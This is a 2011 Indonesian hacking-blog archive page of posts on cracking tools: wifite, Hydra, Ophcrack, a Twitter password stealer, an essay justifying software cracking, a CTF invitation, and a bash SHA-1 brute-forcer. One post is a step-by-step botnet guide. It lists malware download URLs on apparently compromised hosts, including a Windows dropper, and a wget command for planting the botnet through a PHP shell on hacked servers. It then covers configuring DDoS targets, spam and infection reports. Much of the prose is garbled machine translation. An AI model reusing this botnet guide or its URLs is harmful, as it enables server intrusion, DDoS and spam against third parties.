Tampilkan postingan dengan label Cracking. Tampilkan semua postingan
Tampilkan postingan dengan label Cracking. Tampilkan semua postingan

Sabtu, 01 Oktober 2011

0 wifite – Mass Wifi WEP/WPA Key Cracking Tool

06.21 Under From deny saputra
[0 Comment]
wifite dibuat untuk menyerang beberapa jaringan WEP dan WPA dienkripsi pada waktu yang sama. Alat ini akan otomatis disesuaikan dengan hanya beberapa argumen dan dapat dipercaya untuk berjalan tanpa pengawasan.

fitur

     macam target dengan kekuatan (dalam dB); retak jalur akses terdekat pertama
     semua jabat tangan WPA yang didukung (ke direktori wifite.py 's bekerja)
     pertengahan-serangan pilihan: berhenti selama serangan dengan Ctrl + C untukdigunakan (terus, pindah ke target berikutnya, melompat ke retak, keluar)
     berbagai filter untuk menentukan dengan tepat apa yang menyerang (WEP / WPA /baik, di atas kekuatan sinyal tertentu, saluran, dll)
     sangat disesuaikan pengaturan (timeout, paket / detik, dll)
     SKA dukungan (belum dicoba)
     menemukan perangkat dalam mode monitor, jika tidak ada yang ditemukan,meminta untuk seleksi
     semua password disimpan ke log.txt
     beralih serangan WEP tidak me-reset IVS
     menampilkan ringkasan sesi di pintu keluar; menunjukkan tombol apapun retak

Anda dapat mendownload wifite sini:

wifite.py

Read More »

0 THC-Hydra 5.8 Dirilis - Sangat Cepat Multi-Threaded Login / Password Cracker

06.15 Under From deny saputra
[0 Comment]
Nomor satu lubang keamanan terbesar adalah password, karena setiap sandikeamanan menunjukkan studi. Hydra adalah cracker diparalelkan (multi-threaded) loginyang mendukung menyerang / retak protokol banyak. Modul baru mudah untuk menambahkan, selain itu, itu adalah fleksibel dan sangat cepat.

Kami belum disebutkan Hydra sejak jalan kembali pada 2007 - THC-Hydra - PerangkatJaringan Masuk Cepat dan Fleksibel Hacking

Saat ini alat ini mendukung:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL,
          MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5,
          VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3,
          Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, LDAP2,
          Cisco AAA (incorporated in telnet module).
 
 
Terakhir perubahan untuk v5.8

     Ditambahkan Apple Filing Protocol (terima kasih untuk "tidak pernah lelah" MaciejakDavid @ gmail dot com)
     Fixed bug besar di opsi SSL (-S)
Additions prior to public release (v5.7 and before)
  • Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
  • Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz
  • Removed unnecessary compiler warnings
  • Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be
  • Fixed small local defined overflow in the teamspeak module. Does it still work anyway??
  • Moved to GPLv3 License (lots of people wanted that)
  • Upgraded ssh2 module to libssh-0.4.x (thanks to aris (at) 0xbadc0de.be for the 0.2 basis)
  • Added firebird support (by David Maciejak @ GMAIL dot com)
  • Added SIP MD5 auth patch (by Jean-Baptiste Aviat jba [at] hsc [dot] `french tld’)
  • Removed Palm and ARM support
  • Fix for cygwin which falsely detected postgres library when there was none.
You can download Hydra v5.8 here:
 

 

Read More »

0 Crunch - Password Generator Wordlist Cracking

06.10 Under From deny saputra
[0 Comment]
Crunch adalah generator wordlist di mana Anda dapat menentukan karakter set standar atau set karakter yang Anda tentukan. krisis dapat menghasilkan semua kemungkinan kombinasi dan permutasi.

Beberapa pilihan lain adalah:...




Read More »

0 SHA-1 password Cracked Menggunakan GPU Amazon EC2 Cloud

06.04 Under From deny saputra
[0 Comment]
Ini bukan pertama kalinya seseorang telah menarik off ini, kembali pada bulan November 2009 kami menulis tentang Menggunakan Cloud Computing Untuk CrackPassword - Amazon EC2.

Menambahkan bahwa dengan jalan cerita kembali dari 2007 - Kartu Grafis - The Next Big Thing untuk Cracking Password? - Dan Anda punya diri Anda combo yang menarikdengan penawaran baru dari Amazon, didistribusikan GPU berbasis sumber daya.

Masukan dua cerita bersama-sama dalam gaya hacker sejati dan Anda berakhir dengan seorang pria yang digunakan contoh GPU pada platform Amazon EC2 untuk crack SHA-1 hash password.

     Sebuah antusias keamanan Jerman telah menggunakan sumber daya komputasidisewa untuk memecahkan algoritma hashing aman (SHA-1) sandi.

     Thomas Roth menggunakan sumber daya komputer berbasis GPU disewakan untuk menjalankan serangan brute force untuk crack hash SHA1. Ahli enkripsimemperingatkan selama setidaknya lima tahun SHA-1 tidak bisa lagi dianggap aman sehingga apa yang patut dicatat tentang proyek Roth tidak apa yang dia lakukan atau pendekatan yang digunakan, yang pada dasarnya didasarkan pada mencoba setiapkombinasi yang mungkin sampai ia menemukan hit, namun teknologi yang digunakan.

     Apa yang digunakan untuk menjadi barang dari proyek komputasi terdistribusidengan peserta seluruh dunia yang mengambil berbulan-bulan untuk menghasilkan buah sekarang dapat dilakukan oleh seorang individu tunggal dalam menit danmenggunakan sumber daya disewakan bahwa biaya harga yang sama seperti kopipagi hari untuk melaksanakan trik. Roth bukti-konsep olahraga biaya hanya $ 2. Ini adalah jumlah yang dibutuhkan untuk menyewa sebuah bank grafis yang kuatprocessing unit untuk melaksanakan diperlukan angka-angka menggunakanCuda-Multiforcer.

SHA-1 tentu saja retak perjalanan kembali pada tahun 2005, dan banyak dilaporkanpada tahun 2007 - dan sementara yang dihapus ini masih digunakan dalam banyak aplikasi.

Tapi kemudian serangan ini tidak benar-benar menggunakan kelemahan dalamalgoritma - itu hanya lurus ke atas hash retak itu.

Alat yang digunakannya adalah CUDA Multiforcer - GPU Kinerja Multihash Brute pompa kecil Didukung Tinggi.

SHA-1, meskipun dalam proses yang bertahap, masih bentuk komponen dari berbagai aplikasi keamanan secara luas digunakan, termasuk Secure Sockets Layer, Transport Layer Security dan S / MIME protokol. Roth mengklaim telah retak semua hash dari hash 160-bit SHA-1 dengan password antara 1 dan 6 karakter dalam sekitar 49 menit.Proses ini akan menciptakan sebuah meja pelangi, memungkinkan password yang pendek dan karena itu otomatis tidak aman untuk dicocokkan dengan hash mereka. Ini tidak akan bekerja untuk password panjang lagi. Meskipun demikian, semakin besar poin yang disewakan sumber daya komputasi dapat digunakan untuk hacking password masih berdiri. 

    
Keamanan pengamat memperingatkan bahwa pembangunan membuka kemungkinan ulah penjahat cyber menggunakan pay-as-you-go berbasis komputasi awan lingkungan pemrosesan paralel untuk tujuan mereka sendiri jahat. 

    
Chris Burchett, CTO dan co-pendiri Credant perusahaan keamanan data, berkata: "Sangat mudah untuk memulai sebuah cluster 100-simpul retak hanya dengan beberapa klik, tetapi jika Anda memperluas lingkungan pemrosesan paralel dengan hanya beberapa faktor, hal menjadi mungkin untuk crack password dari sebagian besar jenis dalam jangka waktu relatif singkat. " 

    
Penjahat dunia maya mungkin menggunakan kredensial pembayaran kartu curian untuk mendanai awan petualangan mereka retak "yang berarti mereka tidak akan peduli tentang biaya yang terlibat," tambahnya. 

    
Sekitar 12 bulan lalu, seorang hacker topi putih, Moxie Marlinspike, menciptakan sebuah Wi-Fi secara online password cracking layanan yang disebut WPAcracker.com. Layanan $ 17-a-time dapat crack password Wi-Fi di sekitar 20 menit, dibandingkan dengan 120 jam PC dual-core yang dibutuhkan untuk melaksanakan pekerjaan yang sama. 
Meskipun tidak ada yang benar-benar baru di sini, itu masih sebuah implementasi menarik dari beberapa teknik yang sudah dikenal. Seperti awan / komputasi terdistribusi menjadi bahkan lebih murah, aku kira kita akan melihat lebih banyak serangan serupa di masa mendatang. 
Posting asli (yang rincian yang tepat tentang bagaimana untuk mengatur semuanya) dapat ditemukan di blog Thomas Roth di sini:

Cracking Passwords In The Cloud: Amazon’s New EC2 GPU Instances
Read More »

0 TwitterPasswordDecryptor – Instantly Recover Twitter Account Passwords

05.58 Under From deny saputra
[0 Comment]
TwitterPasswordDecryptor adalah alat GRATIS untuk segera memulihkan password akun Twitter yang disimpan oleh web browser populer. Kebanyakan web browser menyimpan login untuk situs yang dikunjungi sehingga pengguna tidak perlu mengingat dan memasukkan password setiap kali. Masing-masing web browser menggunakan mekanisme enkripsi milik mereka sendiri untuk menyimpan password login termasuk passwords.TwitterPasswordDecryptor akun Twitter otomatis merangkak melalui masing-masing browser dan langsung pulih semua password Twitter disimpan. 

TwitterPasswordDecryptor menyajikan kedua antarmuka GUI serta versi baris perintah, yang kemudian adalah lebih bermanfaat untuk penguji penetrasi dalam pekerjaan mereka. Selain dari pengguna normal yang dapat menggunakannya untuk memulihkan password mereka hilang, dapat berguna bagi para pejabat Forensik yang bisa mendapatkan password Twitter disimpan account dan kemudian menggunakan informasi profil Twitter untuk lebih memperluas penyelidikan mereka.

TwitterPasswordDecryptor sepenuhnya alat portable yang dapat langsung dijalankan di mana saja tanpa menginstal secara lokal. Hal ini juga dilengkapi dengan Installer untukmereka yang ingin menginstal secara lokal dan menggunakannya secara teratur. Ia bekerja pada berbagai platform mulai dari Windows XP ke sistem operasi terbaru Windows 7.

fitur

Saat ini mendukung pemulihan dari password akun Twitter disimpan dari browserinternet yang populer berikut:

     Internet Explorer (semua versi 4-8)
     Firefox
     Google Chrome
     Opera Browser

Anda dapat mendownload TwitterPasswordDecryptor sini:



TwitterPasswordDecryptor.zip
Read More »

0 NIX Brute Force - Alat Log-in Brute Memaksa / Password Cracking Paralel

05.53 Under From deny saputra
[0 Comment]
Brute pompa kecil NIX adalah alat yang menggunakan kekerasan secara paralel untuk login ke sistem tanpa autentifikasi terlebih dahulu. Alat ini dimaksudkan untuk menunjukkan pentingnya memilih password yang kuat. Tujuan dari NIX adalah untuk mendukung berbagai layanan yang memungkinkan otentikasi remote seperti: MySQL,SSH, FTP, IMAP. Hal ini didasarkan pada Proxy Checker nix.

fitur

     Dasar Otorisasi & dukungan FORMULIR di kedua modus (SSL) standar dan HTTPS
     HTTP / SOCKS 4 dan 5 dukungan proxy
     FORMULIR auto-deteksi & konfigurasi FORMULIR masukan manual.
     Ini adalah multi-threaded
     Wordlist menyeret melalui macro
     Auto-removal proxy mati atau tidak dapat diandalkan dan ketika situs blokmekanisme perlindungan proxy
     Proxy Terpadu pengacakan untuk mengalahkan mekanisme perlindungan tertentu
     Dengan Sukses dan Kegagalan Tombol hasil adalah 99% akurat
     Coding Advanced dan pengaturan timeout membuatnya mengungguli setiap pompa kecil kasar lainnya

Changelog lengkap termasuk versi terbaru di sini.

Anda dapat mendownload Brute Force NIX sini:
NIX_BruteForce.bz2

Read More »

0 Ophcrack 3.3.1 & Live CD – Free Rainbow Table Password Cracking Tool

05.49 Under From deny saputra
[0 Comment]

Ophcrack adalah Windows Pasword cracker berdasarkan tabel pelangi. Ini adalahimplementasi yang sangat efisien tabel pelangi dilakukan oleh penemu metode ini.Muncul dengan Graphical User Interface dan berjalan pada berbagai platform. Ia bekerja berdasarkan waktu-memori trade-off dengan menggunakan tabel pelangi. Iniadalah varian baru dari aslinya trade off-Hellman, dengan kinerja yang lebih baik. Ini pulih 99,9% dari password alfanumerik dalam hitungan detik.

Kami disebutkan dalam RainbowCrack kami dan Rainbow Tabel artikel, pasti salah satu pilihan bebas terbaik untuk Cracking Rainbow.

fitur

     Berjalan pada Windows, Linux / Unix, Mac OS X
     Retak hash LM dan NTLM.
     Tabel Gratis tersedia untuk Windows XP dan Vista.
     Brute-force modul untuk password sederhana.
     Audit modus dan CSV ekspor.
     Real-time grafik untuk menganalisis password.
     LiveCD tersedia untuk menyederhanakan retak.
     Beban hash dari SAM dienkripsi pulih dari partisi Windows, Vista termasuk.
     Bebas dan open source software (GPL).

Anda dapat menemukan berbagai tabel yang mereka tawarkan di sini (sebagian besar gratis dengan beberapa dibayar):


You can find the various tables they offer here (mostly free with some paid):
Ophcrack Rainbow Tables
And of course our own collection of Free Rainbow Tables and other software here.
You can download Ophcrack 3.3.1 here:
Windows – ophcrack-win32-installer-3.3.1.exe
Source – ophcrack-3.3.1.tar.bz2
Or download the LiveCD here:
To crack XP hashes – ophcrack-xp-livecd-2.3.1.iso
To crack Vista hashes – ophcrack-vista-livecd-2.3.1.iso
Read More »

0 Ophcrack – Web Based Interface For Ophcrack Password Cracking Tool

05.40 Under From deny saputra
[0 Comment]

Aku menduga membaca semua orang sudah tahu tentang Ophcrack - waktu mengagumkan / memori trade-off password cracker. 
Nah di sini adalah antarmuka berbasis web bagus untuk itu. Rainbow Tabel benar-benar berguna ketika hash password retak, tapi satu kelemahan utama dari tabel ini adalah ukuran mereka yang dapat ratusan gigs untuk tabel kompleks. Penulis pikir akan sangat berguna untuk memiliki antarmuka web pribadi untuk tabel Anda pelangi yang dapat Anda akses dari mana saja di web mana saja tanpa harus membawa tabel besar mana pun Anda pergi. Dan baik di sini kita, Wophcrack (Web) Ophcrack.
Ketika Crack LM atau NTLM hash Ophcrack adalah alat yang hebat seperti yang kitabahas ini, ini menyediakan GUI dan CLI pilihan bersama dengan beberapa tabel gratis dan berbayar. Penulis pada dasarnya menulis sebuah antarmuka web PHP cepat dan kotor berbasis untuk Ophcrack.

Wophcrack dirancang untuk bekerja pada Backtrack 4 R2, Meskipun dapat diinstall disetiap distribusi Linux dengan beberapa penyesuaian kecil, Wophcrack juga dapat dengan mudah diedit untuk mendukung Rainbow Crack.

Anda dapat mendownload Wophcrack sini:
 
wophcrack.zip

Read More »

Sabtu, 24 September 2011

0 Filosofi Cracking Software

17.55 Under From deny saputra
[0 Comment]
Pernah dengar istilah kalau ahli komputer (and either hackers or crackers) kadang lebih filosofis dari filsuf itu sendiri? Atau istilah kalau ahli komputer kadang lebih politis dari politisi itu sendiri? Dan lebih ekonomis daripada ekonom itu sendiri? 

Filsafat dan Motif Cracking
Kalau kalian pernah melakukan cracking software pasti akrab sama yang namanya program dissassembler Win32dasm, or debugger Olydbg/softice Win API, sampai Ultra Edit32, Hiew, etc. Tools tersebut digunakan untuk meng-crack software, demi untuk menciptakan sesuatu yang beda!!! Dari patching, serial fishing alias hunting serial number, sampai bikin KeyGens. Suatu proses yang menantang, kalau kata filsuf ‘menjelajahi ruang dan waktu untuk menemukan solusi kehidupan.’
Sebelum berfilosofi diwilayah cracking software, sekedar ngingetin, kalau dulu biasanya nge-crack software mungkin hanya membutuhkan waktu 5 smpai 30 menit, tapi sekarang? Hmm kelihatannya programmer makin cerdas berstrategi dalam karya-karyanya ya. Sebagai contoh, berapa lama waktu yang kamu butuhkan untuk nemuin perintah-perintah ‘registrasi’? Istilah-istilah seperti registrasi error, incomplete or incorrect information, or bla..bla…bla… hari ini gk seutuhnya tercetak ‘percis’ alias seperti yang muncul di nag-screen begitu code-code badan software ditrace di dissassembler kamu. Mau jump sana jump sini, push sana push sini, break sana break sini, patch sana patch sini mesti sukses melewati proses panjang terlebih dulu karena perintah-perintah registrasi tersebut diproteksi dengan sempurna sama empunya alias susah dikenali or istilahnya ‘a key based protection’ salah-salah nyampelah di ‘file invalid’ alias gagal sudah karena usaha anda telah di ‘cut-down.’ Kalaupun gk nemu option itu, tetep waktu mengdissassembler software abis ditahapan awal, misalnya karena software gk punya opsi registrasi, kalau kata pemain bola ‘kerja-keras di 15 menit pertama untuk membobol pertahanan lawan.’



Saya gak akan ngebahas lebih jauh tentang proses dissassembler softwarenya sendiri, karena kawan-kawan pasti lebih tahu.Selanjutnya kita bermain-main dengan filosofi dari motif cracking software.


Dalam salahsatu tutorial cracking yang ditulis mahasiswa asing, dia ngungkapin ‘saya melakukan cracking software karena ilham mimpi, menjelajahi dunia dan tertantang menakhlukannya.Aneh ya kedengarannya. Ceritanya bergini, para cracker (atau pun hacker) adalah orang-orang yang senang berkelana, masuk kewilayah-wilayah yang belum pernah terjamah, mengebiri ratusan dan ribuan kode dalam bahasa pemprogaman. Prinsip mereka ‘semakin sulit software di dissassembler atau semakin susah sistem komputer satu web diakses, semakin memuncak lah adrenalin mereka untuk menaklukannya.’ Jadi salah satu motif cracking atau hacking adalah ‘kesenangan menemukan tantangan.’



Kalau kata Descartes bapak filsafat pencerahan ‘cogito ergo sum’ artinya ‘karena berfikir saya ada’, nah kalau waktu nge-crack otak gak dikuras abis sampe pusing tujuh-keliling jangan pernah berfikir bahwa kalian sukses ‘eksis’ sebagai si ahli komputer. Kalau dalam politik, make otak gagal saatnya make otot, tapi kalau dalam teknologi komputer, make otot buat apa? Otak adalah ‘perangkat’ utama dalam proses cracking software, bahwa si cracker dituntut untuk berfikir filosofis, ‘menemukan sesuatu yang sifatnya dasar atau fundamental (namun kadang terhidden dan memerlukan perhitungan yang matang).’ Ciri seorang filsuf adalah menemukan suatu ‘esensi’ terpendam yang ada dalam kehidupan tapi belum tersentuh manusia. "To boldly go where no one has gone before."


Motif kedua erat kaitannya dengan ‘prinsip distribusi’ (distribution) bahwa karya-karya bermanfaat tersebut seharusnya dapat dinikmati setiap pengguna komputer atau khususnya mereka yang membutuhkan. Para cracker software seneng banget kalau tutorialnya berguna buat orang lain dan kalau software-software yang didissassemblernya disebar ke kalangan maya, nginfoin serial number or bagi-bagi Keygens, macem ‘berbuat baik untuk mendapat pahala’ J Gak jarang dari mereka yang nawarin diri untuk bantuin ngecrack software (thanks buat yg satu ini). Nah kalau diskusi sama kawan politik or hukum, mereka pasti pernah nyebut John Rawls, filsuf modern yang juga pemikir politik-hukum yang terkenal dengan prinsip ‘distribusi keadilan’ (distribution of justice). Nah buat mereka yang terlibat dalam cracking software, prinsip distribusi adalah apa yang disebut ‘fair’ (adil) dalam dunia maya, kalau dapet bocoran software yang dibebaskan orang lain maka harus memberi keadilan untuk orang lain dengan juga membebaskan software dan mendistribusikannya.


Motif ketiga mereka yang ‘melek politik-paham ekonomi’ bakal bilang ‘software-software tersebut seharusnya dapat dimanfaatin setiap orang tanpa harus membayar mahal.’ Bayangin kalau file-recover (saya smpet mo beli sebelum ktmu kawan baik hati) harganya 150 dollar, bisa buat beli memori dan hard disk baru. Suatu nafas anti-kapitalis, anti hegemoni dan eksploitasi korporasi, mengutamakan solidaritas, satu prinsip bahwa manusia sesungguhnya bebas namun terikat. Bebas berkarya, bebas merubah satu karya namun terikat oleh lingkungan dimana ia tinggal, kalau mengutip Rousseau sang fisuf politik “man was born free and he is everywhere in chains.”
Motif terakhir, untuk tujuan pendidikan.

Ekonomi-Politik
Nah sekarang saatnya mengkritisi motif cracking No.3. Langsung saja, kalau dalam kajian ekonomi-politik ada yang namanya ‘intangible assets’ (hal-hal berharga yang tidak dapat diraba) yang bikin software jadi mahal. Bahwa sesuatu yang lahir dari knowledge or skills sangat bernilai atau apa yang disebut dengan ‘the value of information.’ Karena begitu berharganya ‘karya cipta’ tersebut si programmer yang kekeh sama prinsip ‘fundamental paradox of information’ gak akan secara gampang ngejual karya ciptanya ke perusahaan, simple karena dia gak mau softwarenya dimonopoli sama satu korporasi tertentu. Tapi ada juga programmer yang otaknya ‘uang’ aja, berstrategi supaya karya ciptanya bisa menghasilkan profit, karenanya informasi sangat mahal dan berfikir dua kali untuk menyerahkannya ke korporat. Kalau programmer kasih software tapi gk kasih informasi gimana cara buat softwarenya, gimana perusahaan mau deal? Nah untuk mengakomodasi hal tersebut alhasil terbentuklah apa yang namanya ‘Firms’ horizontal integration’ dimana satu software dihandle (diproduksi dan didistribusi) sama lebih dari satu perusahaan untuk menjamin tidak adanya monopoli. Tapi gimanapun juga karena perusahaan pastinya berorientasi profit, jadilah software-software tersebut terjual mahal karena mempertimbangkan profit untuk lebih dari satu perusahaan.


Jadi kalau RMS sejak lama berteriak soal open sources dan kemerdekaan software, ini persoalannya. Untuk menjawab ‘luka batin’ para programmer kalau perusahaan-perusahaan berorientasi profit tersebut bakal memonopoli produk. Kenyataannya sama juga kan, tidak dimonopoli pun melibatkan banyak perusahaan, jatuhnya mahal-mahal juga. Ya itulah ekonomi-politik, makanya lumrah kalau aksi-aksi hacking or cracking berangkat dari mereka yang menentang monopoli korporat atas satu karya cipta, itulah politik. Sekali lagi programmer kadang lebih politis dari politisi itu sendiri. Yang juga mungkin bisa bikin kalian buka mata, pernah denger politisasi anti-virus, kalau virus-virus komputer yang beredar sesungguhnya diciptakan oleh para perusahaan pembuat anti-virus. Kalau masalah tidak diciptakan, maka tidak ada pasar, alias kalau gk ada virus siapa yang mau beli anti-virus… J
Sampai sini dapat pointnya?


Saya cuma mau ngajak kawan-kawan bermain-main sedikit dengan filsafat dan ekonomi-politik dalam kaitannya dengan pembangunan teknologi (komputer), jadi kita bisa melihat segala sesuatunya dari berbagai sudut pandang.



Memahami filosofi dalam berkomputer-ria adalah bahwa dalam melakukan suatu aksi kita selalu dilandasi oleh sebuah pandangan atau alasan ‘kenapa sampai berbuat hacking or cracking’ gk sebatas iseng, just for fun, keuntungan pribadi atau nguji kesabaran orang lain. Kalau bermaksud menguji kemampuan pribadi, jangan pernah lupa kalau kalian hidup ditengah2 masyarakat yang berbeda kepribadian.


Artikel ini tidak menganjurkan atau melegalkan ‘cracking’ terhadap software-software komputer, karena sesungguhnya software adalah ‘produk intelektual’ programmer yang mesti dihargai, hanya saja dihakciptakan perusahaan ‘yang memproduksi dan mendistribusikan.’ Sekarang balik lagi ke urusan manusia dan filosofi aksi-aksi mereka. Apa bener kalau yang bikin software itu alias si programmer sepakat ciptaannya di jual mahal ke publik? Balik lagi deh nanya ke si programmer, mereka bakal jawab ‘programmer juga manusia.’ J Kalau nanya ke produser or distributornya mereka juga bakalan jawab ‘pasar perlu produk sementara produser perlu modal, hasilnya sama-sama mendapat profit.’
Read More »

0 Release Botnet Versi Beta oleh CN Attacker Team

17.54 Under From deny saputra
[0 Comment]


botnet download url :
http://www.teksan-tekstroy.com/.../.data.tgz (untuk infeksi server 2 keluarga nix)

versi mutant (untuk infeksi windows) :
http://www.magicmodems.net/asian_scandal.exe -> upload ke folder yg sama dg botnet linux
mirror 1: http://teksan-tekstroy.com/.../.data.tgz
mirror 2: http://www.capitaoarce.com.br/media/.data.tgz

Baru-baru ini telah direlease sebuah botnet versi beta oleh Kelompok Attacker dari RRC yang mengatas namakan diri mereka CN Attacker Team (kata mereka di blognya sih masih versi beta).
botnet cn attacker team ini memiliki fungsi2 sbb:
- prolonged ddos ( ddos untuk jangka panjang )
- fungsi untuk para spammer (botnet akan mencari alamat2 email dari 24 search engine untuk dikirimkan pesan spam yang sudah diset oleh spammer)
- dan fungsi harvest server (tiap infeksi akan dilaporkan ke email master yang sudah diset)

Ok kali ini saya akan membahas tentang botnet yang dibuat oleh tim cn attacker dari RRC , botnet ini dibagi 2, yang 1 bertujuan menginfeksi server2 dengan linux / free bsd
dan ada juga versi mutantnya untuk menginfeksi pc 2 dengan os ms windows (blindows).

botnet ini bisa diinstall melalui cpanel / php shell / ssh di server 2 linux yang telah kita susupi.

0. METODE SPREAD BOTNET
ssh, ftp brutus, exploit, web apps , dll

1. INSTALASI
untuk menginstallnya sangat2 mudah sekali, dari php shell misal kita download dulu :

wget http://teksan-tekstroy.com/.../.data.tgz
tar zxvf .data.tgz

setelah itu botnet dan file2nya akan ada di direktori dengan nama .backups, misal alamat php shell di :
http://www.raucherhimmel.de/images/nama_php_shell.php

maka lokasi setup botnet di :

http://www.raucherhimmel.de/images/.backups/


2. SETTING TARGET DOMAIN UNTUK DDOS

setiap kali dipasang botnet ini akan otomatis melakukan ddos, misalnya kita setting untuk melakukan dns attack ke suatu domain:



3. SETTING PESAN SPAM UNTUK SPAMMER



lalu isikan subjek dan pesan spam yang akan kita kirimkan, lalu begitu dirun botnet akan otomatis mencari alamat2 email dari 24 search engine

4. SETTING EMAIL MASTER

fungsi ini kadang mengandung bug , digunakan untuk melaporkan infeksi ke email Anda.



TENTANG VERSI MUTANT DARI BOTNET

versi mutant dari botnet digunakan untuk menginfeksi pc 2 windows dan membantu penyebaran botnet linux. agar versi mutant ini terkirim dalam bentuk attachment , silahkan
upload versi mutant dari botnet ini ke folder yang sama dg folder botnet linux di .backups



botnet download url :
http://mommygrads.com/libraries/.data.tgz

versi mutant (untuk infeksi windows) :
http://www.magicmodems.net/asian_scandal.exe -> upload ke folder yg sama dg botnet linux
mirror 1: http://teksan-tekstroy.com/.../.data.tgz
mirror 2: http://www.sowiesoft.com/.../.data.tgz
Read More »

0 CTF | Login Cracking (With POC)

17.14 Under From deny saputra
[0 Comment]
Dear Sobat GEMPAR69

Sebenarnya ini bukan dalam rangka apa2, tetapi dikarenakan dengan tujuan untuk menumbuhkan semangat dalam diri untuk belajar tentang dunia Reverse Enginering maka saya memberikan semacam Games.

Games ini sebenarnya cukup simple, yaitu mencoba membedah applikasi yang saya berikan dan kemudian untuk menemukan Username dan Password yg tepat untuk digunakan dalam login kedalam Applikasi.Dan tidak lupa jika telah berhasil, POC (Proof Of Concept) tersebut ditulis dan dikirim ke Email untuk Konfirmasi Hadiahnya


Lebih Lanjut Pejelasannya


Materi

- Reverse Enginering
- Cryptography

Cara Bermain :

- Download File yg akan di cracking di
SINI

- Temukan Username / Password untuk login ke applikasi Login.exe
- Jika Username / password cocok maka akan ada notifikasi sukses, dan bagaimana cara klaim hadiah
- Semoga Sukses
Read More »

Sabtu, 17 September 2011

0 SHA1 Cracking Utility

20.30 Under From deny saputra
[0 Comment]

#!/usr/bin/env bash
# SHA1 Cracker V1.0
# coded By 0x90 2009
# 0x90[at]bsdmail.org
# This small tool will bruteForce SHA1 hash
# tested on Fedora Linux
#
#    I do not take any reponsibilty for what you do with this tool 
#    Hopefully it will make your life easier rather then making other 
#    peoples lives more difficult!
##############################
#  ___        ___   ___  
# / _ \      / _ \ / _ \ 
#| | | |_  _| (_) | | | |
#| | | \ \/ /\__, | | | |
#| |_| |>  <   / /| |_| |
# \___//_/\_\ /_/  \___/ 
##############################  
 
echo ".:: SHA1 Cracker, Coded By 0x90 ::."
echo -n "Enter SHA1 Hash: "
read hash
if [ -z "$hash" ] || [ "${#hash}" != "40" ]; then
echo "Error: please Enter a valid SHA1 hash"
exit
 fi
echo
 
 
echo -n "Select BruteForce Method:
1: Random BruteForce
2: Dictionary BruteForce
Enter your choise 1 or 2: "
read choise
if [ -z "$choise" ] || [ "$choise" != "1" ] && [ "$choise" != "2" ]; then
echo "Error: please choise between 1 or 2"
exit 1
 fi
#########################
# Random BruteForce
#########################
 
if [ "$choise" == "1" ]; then
echo "use Random method to crack"
echo "trying to bruteforce SHA1 hash ..."
 
echo -n "enter min lengh: "
read minlen
echo -n "enter max lengh: "
read maxlen
 
echo -n "Select bruteForce mode:
all, alnum, lower, upper, digit, alpha, symbols
> "
read mode
 
if [ "$mode" = "all" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! # \$ % & \' ( ) \* + , - . / : ; & < = > ? @ [ \\ ] ^ _ { | } ~"
 fi
if [ "$mode" = "alnum" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9"
 fi
if [ "$mode" = "alpha" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9"
 fi
if [ "$mode" = "lower" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z"
 fi
if [ "$mode" = "upper" ]; then
char="A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
 fi
if [ "$mode" = "digit" ]; then
char="0 1 2 3 4 5 6 7 8 9"
 fi
if [ "$mode" = "symbols" ]; then
char="! # \$ % & \' ( ) \* + , - . / : ; & < = > ? @ [ \\ ] ^ _ { | } ~"
        fi
 
 
bf(){
        for c in $char ; do
 
                nc=$[$nc+1]
                ch[$nc]=$c
        done
        for x in `seq 1 $[$maxlen+1]` ; do
 
                if [ $minlen -ge $x ] ; then
                        ci[$x]=1
                else
                        ci[$x]=0
                fi
        done
        for clen in `seq $minlen $maxlen` ; do
 
                while [ ${ci[$[$clen+1]]} -ne 1 ] ; do
                        wrd=""
                        for x in `seq $clen -1 1` ; do
                                wrd=$wrd${ch[${ci[$x]}]}
                        done
 
 
sha1_hash=`echo -n "$wrd" | sha1sum | awk '{ print $1 }'`
 
 
echo "$wrd: hash: $sha1_hash"
if [ "$sha1_hash" == "$hash" ]; then
echo
echo "Cracked, SHA1 password is: $wrd"
 exit 0
 fi
                        ci[1]=$[${ci[1]}+1]
                        for x in `seq 1 $clen`; do
                                if [ ${ci[$x]} -gt $nc ] ; then
                                        ci[$x]=1
                                        ci[$[$x+1]]=$[${ci[$[$x+1]]}+1]
                                fi
                        done
                done
        done
}
 
bf
 
 
 
fi
#########################
# Dictionary BruteForce
#########################
# Cain&Abel wordlist http://www.md5this.com/Wordlist.zip
# dont forget to convert the wordlist to Unix file format
# dos2unix Wordlist.txt
if [ "$choise" == "2" ]; then
echo "use dictionary method to crack"
echo -n "Enter dictionary name: "
read dic
echo "trying to bruteforce SHA1 hash ..."
 
n=`cat $dic | wc -l`
 
echo "we have $n password to try"
for (( i=1; i <= $n; i++));
 do
pass=`sed -n "$i"p $dic`
sha1_hash=`echo -n "$pass" | sha1sum | awk '{ print $1 }'`
 
echo "$i: hash: $sha1_hash"
 
if [ "$sha1_hash" == "$hash" ]; then
echo
echo "Cracked, SHA1 password is: $pass"
 exit 0
 fi
 done
fi
 exit
Read More »